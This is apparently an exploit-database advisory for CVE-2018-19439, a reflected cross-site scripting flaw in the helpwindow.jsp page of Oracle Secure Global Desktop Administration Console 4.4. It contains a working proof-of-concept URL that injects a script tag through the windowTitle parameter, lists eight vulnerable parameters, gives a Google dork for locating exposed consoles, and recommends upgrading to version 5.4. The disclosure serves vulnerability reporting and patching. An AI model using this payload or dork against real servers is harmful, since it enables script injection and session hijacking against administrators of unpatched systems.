Oracle Secure Global Desktop Administration Console 4.4 Cross Site Scripting

`<!--  
# Exploit Title: Cross Site Scripting in Oracle Secure Global Desktop  
Administration Console - 4.4; Build: 20080807152602  
# Date: 22-11-2018  
# Exploit Author: Rafael Pedrero  
# Vendor Homepage: http://www.oracle.com/  
# Software Link: http://www.oracle.com/  
# Version: Oracle Secure Global Desktop Administration Console - 4.4;  
Build: 20080807152602  
# Tested on: all  
# CVE : CVE-2018-19439  
# Category: webapps  
  
1. Description  
  
Cross Site Scripting exists in the Administration Console in Oracle Secure  
Global Desktop 4.4 20080807152602. The page "helpwindow.jsp" has reflected  
XSS via all parameters.  
  
  
2. Proof of Concept  
  
http://X.X.X.X/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelp  
Window></TITLE></HEAD><body><script>alert("XSS")</script><!--&  
> helpFile=concepts.html&pageTitle=Administrator  
Help&mastheadUrl=/images/productNameSecondaryMasthead.png&mastheadDescription=Sun  
Secure Global Desktop  
Administration&jspPath=/sgdadmin/faces/com_sun_web_ui/help/&mastheadHeight=40&mastheadWidth=20  
  
Vulnerables parameters:  
windowTitle, helpFile, pageTitle, mastheadUrl, mastheadDescription,  
jspPath, mastheadHeight and mastheadWidth.  
  
Google dorks:  
inurl:"/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp"  
  
  
3. Solution:  
  
Update to the latests version Oracle Secure Global Desktop Administration  
Console 5.4.  
  
-->  
  
  
`